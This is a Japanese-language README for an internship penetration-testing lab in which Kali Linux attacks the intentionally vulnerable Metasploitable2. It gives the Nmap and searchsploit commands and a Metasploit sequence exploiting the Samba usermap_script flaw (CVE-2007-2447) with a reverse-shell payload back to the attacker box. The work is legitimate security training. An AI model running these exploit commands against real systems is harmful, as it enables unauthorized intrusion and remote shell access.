
ハンズオンペンテストプロジェクト(Kali Linux vs Metasploitable2)。完全なワークフローを含む:Nmapスキャン、列挙、Metasploitによるエクスプロイト(Samba CVE-2007-2447)、ポストエクスプロイト検証、および緩和策。リポジトリにはコマンド、出力、レポートが含まれており、攻撃手法と防御策の両方を示している。
インターンシッププロジェクト2 — Metasploitable2 へのペネトレーションテスト
概要: このプロジェクトは、完全なペネトレーションテストのワークフロー(偵察、列挙、エクスプロイト、ポストエクスプロイト検証、緩和策の推奨)を示します。使用したターゲットは Metasploitable2、攻撃ボックスは Kali Linux です。
ツール: Kali Linux (攻撃者) Nmap (偵察) Metasploit Framework (エクスプロイト) SearchSploit / Exploit-DB (トリアージ)
実行手順:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
特定したサービス(例):vsftpd 2.3.4(ポート21バナー)、Samba smbd 3.x(ポート445)。searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
サービスと潜在的なエクスプロイト(vsftpd バックドア、Samba username-map)をマッチング。msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.x.x
set payload cmd/unix/reverse
set LHOST <kali-ip>
set LPORT 4444
exploit
対話型シェルを取得し、ユーザーコンテキストを確認。
4. ポストエクスプロイト
id uname -a 結果 Samba エクスプロイトを介してリモートシェルを取得し、攻撃経路を文書化し、緩和計画を作成しました。完全なログとコマンド出力は scans/ フォルダに保存されています。